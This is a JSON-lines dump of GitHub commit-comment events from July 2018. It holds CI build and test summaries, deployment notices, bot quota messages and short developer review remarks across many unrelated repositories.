{"id":"7946521608","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663303,"position":null,"line":null,"path":null,"commit_id":"ecab6785860d51424dee44a1c78b008b75a9dfd8","created_at":"2018-07-10T21:37:44Z","updated_at":"2018-07-10T21:37:44Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-MacOS-10.9-clang: OK (2921 of 2930 tests passed, 27 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 7 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 12 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 621\n * Failed: 4\n\nregression Test Summary\n * Passed: 618\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ecab6785860d51424dee44a1c78b008b75a9dfd8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T21:37:44Z"}
{"id":"7946524212","type":"CommitCommentEvent","actor":{"login":"jacksonbrandao"},"repo":{"name":"rodmatola/robot-framework-blog-concrete"},"payload":{"comment":{"id":29663306,"position":null,"line":null,"path":null,"commit_id":"1b8663560d3c585d82c528eb1a1782976b3742d5","created_at":"2018-07-10T21:38:18Z","updated_at":"2018-07-10T21:38:18Z","author_association":"NONE","body":"Com tudo pronto, como executo o projeto .robot?"}},"created_at":"2018-07-10T21:38:18Z"}
{"id":"7946527365","type":"CommitCommentEvent","actor":{"login":"nombrekeff"},"repo":{"name":"nombrekeff/loggin-js"},"payload":{"comment":{"id":29663310,"position":32,"line":34,"path":"lib/formatters.js","commit_id":"0b758d5b8b4f2d509e1d5f0fa4913c1421eb5731","created_at":"2018-07-10T21:38:59Z","updated_at":"2018-07-10T21:38:59Z","author_association":"OWNER","body":"Here on down is fix for: #18 \r\n"}},"created_at":"2018-07-10T21:38:59Z"}
{"id":"7946527467","type":"CommitCommentEvent","actor":{"login":"dbaeumer"},"repo":{"name":"Microsoft/vscode-languageserver-node"},"payload":{"comment":{"id":29663311,"position":null,"line":null,"path":null,"commit_id":"7994319e90866970f68fdd828b4dc03da5fdc423","created_at":"2018-07-10T21:39:00Z","updated_at":"2018-07-10T21:39:00Z","author_association":"MEMBER","body":"Will do. Sorry."}},"created_at":"2018-07-10T21:39:00Z"}
{"id":"7946528639","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29663314,"position":null,"line":null,"path":null,"commit_id":"4ed45d12e80b37a6f5c531429722ce771ec66a24","created_at":"2018-07-10T21:39:16Z","updated_at":"2018-07-10T21:39:16Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.730.4ed45d12e80b37a6f5c531429722ce771ec66a24](http://build.palaso.org/viewLog.html?buildId=124559&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1862, ignored: 18 Build time: 00:15:11"}},"created_at":"2018-07-10T21:39:16Z"}
{"id":"7946536985","type":"CommitCommentEvent","actor":{"login":"kimto341"},"repo":{"name":"kimto341/lab01-intro-to-xcode"},"payload":{"comment":{"id":29663325,"position":null,"line":null,"path":null,"commit_id":"48aa1ace18c90e1effc507ff2e5745db52e7f456","created_at":"2018-07-10T21:41:07Z","updated_at":"2018-07-10T21:41:07Z","author_association":"OWNER","body":"There is an error about Code signing stuff."}},"created_at":"2018-07-10T21:41:07Z"}
{"id":"7946538966","type":"CommitCommentEvent","actor":{"login":"pcfe"},"repo":{"name":"RedHatSatellite/soe-ci"},"payload":{"comment":{"id":29663328,"position":null,"line":null,"path":null,"commit_id":"019f5d494e0f237663e36ff0957c41752ca42002","created_at":"2018-07-10T21:41:32Z","updated_at":"2018-07-10T21:41:32Z","author_association":"COLLABORATOR","body":"this should fix #109"}},"created_at":"2018-07-10T21:41:32Z"}
{"id":"7946540780","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29663332,"position":1,"line":1,"path":"docs/logs/json.md","commit_id":"0c1215499a4e79e6e45e86a7125e221eaf7188e4","created_at":"2018-07-10T21:41:57Z","updated_at":"2018-07-10T21:41:57Z","author_association":"MEMBER","body":"@goranbajic This may be a suitable title when displayed in docs, but is that the best thing for Goog? "}},"created_at":"2018-07-10T21:41:57Z"}
{"id":"7946542157","type":"CommitCommentEvent","actor":{"login":"PhoebeKass"},"repo":{"name":"PhoebeKass/test-gatsby"},"payload":{"comment":{"id":29663337,"position":null,"line":null,"path":null,"commit_id":"64833e467b976745a0e0b5de4aa624c93e9790a3","created_at":"2018-07-10T21:42:17Z","updated_at":"2018-07-10T21:42:17Z","author_association":"OWNER","body":"adding CNAME file"}},"created_at":"2018-07-10T21:42:17Z"}
{"id":"7946546138","type":"CommitCommentEvent","actor":{"login":"rodmatola"},"repo":{"name":"rodmatola/robot-framework-blog-concrete"},"payload":{"comment":{"id":29663345,"position":null,"line":null,"path":null,"commit_id":"1b8663560d3c585d82c528eb1a1782976b3742d5","created_at":"2018-07-10T21:43:11Z","updated_at":"2018-07-10T21:43:11Z","author_association":"OWNER","body":"robot [nome do arquivo]"}},"created_at":"2018-07-10T21:43:11Z"}
{"id":"7946546319","type":"CommitCommentEvent","actor":{"login":"anupritaisno1"},"repo":{"name":"GlassROM-devices/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":29663346,"position":null,"line":null,"path":null,"commit_id":"e706da34a2a5db337e89fa8f9be21e4d3c2ce531","created_at":"2018-07-10T21:43:13Z","updated_at":"2018-07-10T21:43:13Z","author_association":"COLLABORATOR","body":"Note that you need to make your own sepolicy\r\nThis sepolicy is only for modern devices that either shipped with Oreo or were properly brought up with at least everything related to audio binderised otherwise this won't work at all\r\n\r\nThis won't work on official lineage or other ROMs unless you pick a few more commits from my tree, even on oneplus2\r\n\r\nMore specifically, you need to first binderise the audio HAL and pick my commit to strict-align the kernel before this sepolicy will even work"}},"created_at":"2018-07-10T21:43:13Z"}
{"id":"7946546851","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ordered-set-feedstock"},"payload":{"comment":{"id":29663348,"position":null,"line":null,"path":null,"commit_id":"18d7ff73ebfb9d8dd8c96c84710fb3721308dbf5","created_at":"2018-07-10T21:43:21Z","updated_at":"2018-07-10T21:43:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @benjwadams were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @benjwadams were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T21:43:21Z"}
{"id":"7946547464","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29663349,"position":12,"line":12,"path":"StockMarket/Services/IMonthMapperService.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T21:43:28Z","updated_at":"2018-07-10T21:43:28Z","author_association":"NONE","body":"Use IEnumerable instead. It makes your code more flexible.\r\nhttps://stackoverflow.com/questions/1347172/explanation-why-ienumerable-is-more-efficient-then-a-list"}},"created_at":"2018-07-10T21:43:28Z"}
{"id":"7946548042","type":"CommitCommentEvent","actor":{"login":"urvish-mahida-exa"},"repo":{"name":"Yelp/elastalert"},"payload":{"comment":{"id":29663352,"position":null,"line":null,"path":null,"commit_id":"9c6e4d4d16361b604dc89f6a95296da5f03a815e","created_at":"2018-07-10T21:43:35Z","updated_at":"2018-07-10T21:43:35Z","author_association":"CONTRIBUTOR","body":"@Qmando bump."}},"created_at":"2018-07-10T21:43:35Z"}
{"id":"7946550333","type":"CommitCommentEvent","actor":{"login":"anupritaisno1"},"repo":{"name":"GlassROM-devices/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":29663355,"position":null,"line":null,"path":null,"commit_id":"e706da34a2a5db337e89fa8f9be21e4d3c2ce531","created_at":"2018-07-10T21:44:08Z","updated_at":"2018-07-10T21:44:08Z","author_association":"COLLABORATOR","body":"Jdsp lib is generic and needs to be recompiled as a blob specific to op2"}},"created_at":"2018-07-10T21:44:08Z"}
{"id":"7946551476","type":"CommitCommentEvent","actor":{"login":"MPiwowarski"},"repo":{"name":"Jozin1987/tests"},"payload":{"comment":{"id":29663356,"position":12,"line":12,"path":"StockMarket/Services/MonthMapperService.cs","commit_id":"95bd47440047493d26552772c4650396d2a9fbc0","created_at":"2018-07-10T21:44:24Z","updated_at":"2018-07-10T21:44:24Z","author_association":"NONE","body":"use IEnumerable"}},"created_at":"2018-07-10T21:44:24Z"}
{"id":"7946552616","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29663357,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-10T21:44:41Z","updated_at":"2018-07-10T21:44:41Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-773](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-773).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-773-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-10T21:44:41Z"}
{"id":"7946552655","type":"CommitCommentEvent","actor":{"login":"tdhooper"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29663358,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-10T21:44:42Z","updated_at":"2018-07-10T21:44:42Z","author_association":"COLLABORATOR","body":"Oh no! Have you asked them if they'll make an exception for this?"}},"created_at":"2018-07-10T21:44:42Z"}
{"id":"7946553348","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29663364,"position":null,"line":null,"path":null,"commit_id":"5edc5c2b371e1f8b98403255fdccb7a749b8af3a","created_at":"2018-07-10T21:44:52Z","updated_at":"2018-07-10T21:44:52Z","author_association":"NONE","body":"Nice project structure, the version that i see doesn't have service layer, but i saw you implement it after. In my opinion you have to care about your namings, and everything will be fine 👍 "}},"created_at":"2018-07-10T21:44:52Z"}
{"id":"7946554048","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29663367,"position":null,"line":null,"path":null,"commit_id":"038b2c14770cc9e5cef1effd111eecd4e2a37627","created_at":"2018-07-10T21:45:03Z","updated_at":"2018-07-10T21:45:03Z","author_association":"OWNER","body":"Build version: __`2.0.2-feat-sourcemaps.24`__ :crossed_fingers: [`feat-sourcemaps`](https://github.com/streamich/nano-css/tree/feat-sourcemaps) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/24) :tada:"}},"created_at":"2018-07-10T21:45:03Z"}
{"id":"7946559094","type":"CommitCommentEvent","actor":{"login":"homes32"},"repo":{"name":"pebakery/pebakery"},"payload":{"comment":{"id":29663374,"position":null,"line":null,"path":null,"commit_id":"7df282968174454b95fdfa91d402906f9ba38fd8","created_at":"2018-07-10T21:46:16Z","updated_at":"2018-07-10T21:46:16Z","author_association":"MEMBER","body":"On a quick test it looks like the original script is destroyed if a download is corrupted. I suggest making a copy of or renaming the old script so that it can be reverted in the event this happens."}},"created_at":"2018-07-10T21:46:16Z"}
{"id":"7946561356","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29663384,"position":null,"line":null,"path":null,"commit_id":"5236cb93ceae0d00e6b06e62c6e4ddf9d580a834","created_at":"2018-07-10T21:46:48Z","updated_at":"2018-07-10T21:46:48Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - Win64-Windows-7-VisualStudio-14: OK (2930 of 2931 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T21:46:48Z"}
{"id":"7946561725","type":"CommitCommentEvent","actor":{"login":"Qmando"},"repo":{"name":"Yelp/elastalert"},"payload":{"comment":{"id":29663385,"position":null,"line":null,"path":null,"commit_id":"9c6e4d4d16361b604dc89f6a95296da5f03a815e","created_at":"2018-07-10T21:46:54Z","updated_at":"2018-07-10T21:46:54Z","author_association":"MEMBER","body":"@urvish-mahida-exa \r\nI'll do this today before I leave."}},"created_at":"2018-07-10T21:46:54Z"}
{"id":"7946565117","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29663390,"position":null,"line":null,"path":null,"commit_id":"8dc6e2e20a2f3c1b26afd868e41158f28c0dc61d","created_at":"2018-07-10T21:47:40Z","updated_at":"2018-07-10T21:47:40Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T21:47:40Z"}
{"id":"7946566285","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29663395,"position":null,"line":null,"path":null,"commit_id":"c427d7d95022da08b50cf5520608060eec480251","created_at":"2018-07-10T21:47:59Z","updated_at":"2018-07-10T21:47:59Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.731.c427d7d95022da08b50cf5520608060eec480251](http://build.palaso.org/viewLog.html?buildId=124561&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:59"}},"created_at":"2018-07-10T21:47:59Z"}
{"id":"7946571773","type":"CommitCommentEvent","actor":{"login":"familyarcangel12"},"repo":{"name":"iMeiji/shadowsocks_install"},"payload":{"comment":{"id":29663405,"position":2,"line":11,"path":"README.md","commit_id":"242765df08bad13005816bb4ea9ff812dfe7f66f","created_at":"2018-07-10T21:49:22Z","updated_at":"2018-07-10T21:49:22Z","author_association":"NONE","body":"Ervildgarcangel031214@gmail.com "}},"created_at":"2018-07-10T21:49:22Z"}
{"id":"7946573816","type":"CommitCommentEvent","actor":{"login":"darix"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29663409,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T21:49:52Z","updated_at":"2018-07-10T21:49:52Z","author_association":"NONE","body":"this is the **first** library where i run into this. And I package a lot of things for linux. a lot of cmake things too."}},"created_at":"2018-07-10T21:49:52Z"}
{"id":"7946575312","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29663412,"position":null,"line":null,"path":null,"commit_id":"6f6a5b15da0c8abc95c10cd5243805eda6f30b8e","created_at":"2018-07-10T21:50:15Z","updated_at":"2018-07-10T21:50:15Z","author_association":"NONE","body":"The style of your commit messages is good, but you should pay more attention to make it more in depth about the changes you have made."}},"created_at":"2018-07-10T21:50:15Z"}
{"id":"7946576270","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"rwaldron/tc39-notes"},"payload":{"comment":{"id":29663414,"position":341,"line":341,"path":"es9/2018-05/may-22.md","commit_id":"ad06dc3a9a3855384a5da6d5f48faa9310d03b8b","created_at":"2018-07-10T21:50:28Z","updated_at":"2018-07-10T21:50:28Z","author_association":"CONTRIBUTOR","body":"It seemed pointless *to him*. It's not pointless to others on the committee.\r\n\r\nOptional catch is in no way pointless, and is very useful to have in the language.\r\n\r\nEither way, a comment on this commit for a stage 4 feature is both the wrong place, and *far* too late, to voice this concern."}},"created_at":"2018-07-10T21:50:28Z"}
{"id":"7946577914","type":"CommitCommentEvent","actor":{"login":"TheRoboticon"},"repo":{"name":"DynoCC/Dyno-Custom-Commands"},"payload":{"comment":{"id":29663417,"position":null,"line":null,"path":null,"commit_id":"929502e4f65267c2efef7c85ac6685de9940252d","created_at":"2018-07-10T21:50:53Z","updated_at":"2018-07-10T21:50:53Z","author_association":"CONTRIBUTOR","body":"Change Theme."}},"created_at":"2018-07-10T21:50:53Z"}
{"id":"7946590871","type":"CommitCommentEvent","actor":{"login":"andyczerwonka"},"repo":{"name":"sangria-graphql/sangria-website"},"payload":{"comment":{"id":29663446,"position":null,"line":null,"path":null,"commit_id":"3456cc264c995701f472aaa94e655ca3a2c84fe4","created_at":"2018-07-10T21:54:00Z","updated_at":"2018-07-10T21:54:00Z","author_association":"NONE","body":"Perfect."}},"created_at":"2018-07-10T21:54:00Z"}
{"id":"7946590986","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29663447,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-10T21:54:02Z","updated_at":"2018-07-10T21:54:02Z","author_association":"CONTRIBUTOR","body":"@ondrejmirtes Please consider removing `vendor` as is may cause test failures.\r\nPlease see https://github.com/travis-ci/travis-ci/issues/4579#issuecomment-127972205"}},"created_at":"2018-07-10T21:54:02Z"}
{"id":"7946595660","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"phpstan/phpstan"},"payload":{"comment":{"id":29663457,"position":null,"line":null,"path":null,"commit_id":"ea30584b2aa2b605e01dbca1cc30f3fb136b990a","created_at":"2018-07-10T21:55:12Z","updated_at":"2018-07-10T21:55:12Z","author_association":"CONTRIBUTOR","body":"We have talked about it in WP-CLI."}},"created_at":"2018-07-10T21:55:12Z"}
{"id":"7946595874","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29663458,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-10T21:55:15Z","updated_at":"2018-07-10T21:55:15Z","author_association":"NONE","body":"`2018_08_10_10_world.sql` `<-` we have not reached August 10, 2018 yet..."}},"created_at":"2018-07-10T21:55:15Z"}
{"id":"7946599296","type":"CommitCommentEvent","actor":{"login":"MiquelaIman"},"repo":{"name":"MiquelaIman/Studiekeuze"},"payload":{"comment":{"id":29663461,"position":null,"line":null,"path":null,"commit_id":"121e6d861bed17c62f54315946705169778efc6f","created_at":"2018-07-10T21:56:00Z","updated_at":"2018-07-10T21:56:00Z","author_association":"OWNER","body":"css pagina gemaakt in notepad, nu overgeplaatst naar GitHub. Hier moet uiteindelijk de pagina gemaakt worden. "}},"created_at":"2018-07-10T21:56:00Z"}
{"id":"7946604933","type":"CommitCommentEvent","actor":{"login":"jonashen"},"repo":{"name":"rlworkgroup/garage"},"payload":{"comment":{"id":29663466,"position":13,"line":72,"path":"garage/misc/tensorboard_output.py","commit_id":"fc9680b567045fc4624edba9e69243759b675c7d","created_at":"2018-07-10T21:57:20Z","updated_at":"2018-07-10T21:57:20Z","author_association":"MEMBER","body":"tf.name_scope"}},"created_at":"2018-07-10T21:57:20Z"}
{"id":"7946605786","type":"CommitCommentEvent","actor":{"login":"MiquelaIman"},"repo":{"name":"MiquelaIman/Studiekeuze"},"payload":{"comment":{"id":29663472,"position":null,"line":null,"path":null,"commit_id":"7f6eef6b0417b601f36a871bd18eb399842d4888","created_at":"2018-07-10T21:57:32Z","updated_at":"2018-07-10T21:57:32Z","author_association":"OWNER","body":"breadcrumbs, weggehaald want die wil ik niet toepassen, omdat ik toch heb besloten dat het één pagina word. "}},"created_at":"2018-07-10T21:57:32Z"}
{"id":"7946607926","type":"CommitCommentEvent","actor":{"login":"Dancopy"},"repo":{"name":"Sooner-Competitive-Robotics/colorduino-slave"},"payload":{"comment":{"id":29663479,"position":null,"line":null,"path":null,"commit_id":"b6f1b5f1ba05708068aac0d2f03c23b8b85201bb","created_at":"2018-07-10T21:58:04Z","updated_at":"2018-07-10T21:58:04Z","author_association":"NONE","body":"Greetings jkleiber! I do not know what your sketch does; I would like a code for scrolling text with 2 or 3 Colorduino; Can I do this with your sketch? Thank you"}},"created_at":"2018-07-10T21:58:04Z"}
{"id":"7946611271","type":"CommitCommentEvent","actor":{"login":"MiquelaIman"},"repo":{"name":"MiquelaIman/Studiekeuze"},"payload":{"comment":{"id":29663492,"position":null,"line":null,"path":null,"commit_id":"824ff0ac6d368a75e7c4497cac43335458575c4c","created_at":"2018-07-10T21:58:51Z","updated_at":"2018-07-10T21:58:51Z","author_association":"OWNER","body":"het menu haal ik weg, ik wil er een pagina van maken in plaats van meerdere. De reden hiervoor is dat het mij niet lukt om de pagina's naar elkaar te linken. "}},"created_at":"2018-07-10T21:58:51Z"}
{"id":"7946611833","type":"CommitCommentEvent","actor":{"login":"weirdNox"},"repo":{"name":"seagle0128/doom-modeline"},"payload":{"comment":{"id":29663495,"position":5,"line":1022,"path":"doom-modeline.el","commit_id":"501a930d32f236f08da6b787a69e2ff904c9c22f","created_at":"2018-07-10T21:58:59Z","updated_at":"2018-07-10T21:58:59Z","author_association":"NONE","body":"This change causes this to happen:\r\n![image](https://user-images.githubusercontent.com/3155049/42540023-d084cb36-8494-11e8-8c94-de8c97d67016.png)\r\n"}},"created_at":"2018-07-10T21:58:59Z"}
{"id":"7946613210","type":"CommitCommentEvent","actor":{"login":"MiquelaIman"},"repo":{"name":"MiquelaIman/Studiekeuze"},"payload":{"comment":{"id":29663498,"position":null,"line":null,"path":null,"commit_id":"c9fafdd00a096c859582b82e8579f294b05d4502","created_at":"2018-07-10T21:59:18Z","updated_at":"2018-07-10T21:59:18Z","author_association":"OWNER","body":"fouter haal ik ook weg vind ik overbodig\r\n"}},"created_at":"2018-07-10T21:59:18Z"}
{"id":"7946614039","type":"CommitCommentEvent","actor":{"login":"tonyr729"},"repo":{"name":"tonyr729/BYOB"},"payload":{"comment":{"id":29663499,"position":null,"line":null,"path":null,"commit_id":"3bced1e62eff0f07a93e92a68268002d332df21c","created_at":"2018-07-10T21:59:31Z","updated_at":"2018-07-10T21:59:31Z","author_association":"OWNER","body":"Fixes #3 "}},"created_at":"2018-07-10T21:59:31Z"}
{"id":"7946621924","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29663529,"position":null,"line":null,"path":null,"commit_id":"c427d7d95022da08b50cf5520608060eec480251","created_at":"2018-07-10T22:01:16Z","updated_at":"2018-07-10T22:01:16Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.45.c427d7d95022da08b50cf5520608060eec480251](http://build.palaso.org/viewLog.html?buildId=124562&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **SUCCESS**\nSummary: Tests passed: 1854, ignored: 18 Build time: 00:14:10"}},"created_at":"2018-07-10T22:01:16Z"}
{"id":"7946622160","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"alexbgameson/PMMPPlugins"},"payload":{"comment":{"id":29663531,"position":null,"line":null,"path":null,"commit_id":"b8883e1519ab32803747c750d490a595eb2adc16","created_at":"2018-07-10T22:01:20Z","updated_at":"2018-07-10T22:01:20Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/alexbgameson/PMMPPlugins/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `c5c1e0d8-848c-11e8-8f6c-e39197322e6a`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T22:01:20Z"}
{"id":"7946624331","type":"CommitCommentEvent","actor":{"login":"epodigital"},"repo":{"name":"epodigital/Rainbow-Poem"},"payload":{"comment":{"id":29663535,"position":null,"line":null,"path":null,"commit_id":"ae6acbc5cc37cd7e1f10ce3b45b74b4f31cf8477","created_at":"2018-07-10T22:01:49Z","updated_at":"2018-07-10T22:01:49Z","author_association":"OWNER","body":"# Git and GitHub for Poets\r\n## From \r\n> Git and GitHub for Poets Video Series Tutorial \r\n## by Daniel Shiffman\r\n## YouTube Playlist [https://youtu.be/BCQHnlnPusY](url)\r\n"}},"created_at":"2018-07-10T22:01:49Z"}
{"id":"7946624348","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29663536,"position":null,"line":null,"path":null,"commit_id":"9a07b0e739e37ed0ba552f179407a54b12414bcb","created_at":"2018-07-10T22:01:49Z","updated_at":"2018-07-10T22:01:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-457](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-457).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-457-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-10T22:01:49Z"}
{"id":"7946627376","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"alexbgameson/PMMPPlugins"},"payload":{"comment":{"id":29663540,"position":null,"line":null,"path":null,"commit_id":"30507196e8ae866367e367ebee0694cdaed6d3ce","created_at":"2018-07-10T22:02:34Z","updated_at":"2018-07-10T22:02:34Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/alexbgameson/PMMPPlugins/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `f2143e6a-848c-11e8-9152-402323c1b887`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T22:02:34Z"}
{"id":"7946627418","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29663541,"position":null,"line":null,"path":null,"commit_id":"41c3cf45af5f41dfc344e85caee9048a81ba8468","created_at":"2018-07-10T22:02:35Z","updated_at":"2018-07-10T22:02:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-37](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-37).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-37-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-10T22:02:35Z"}
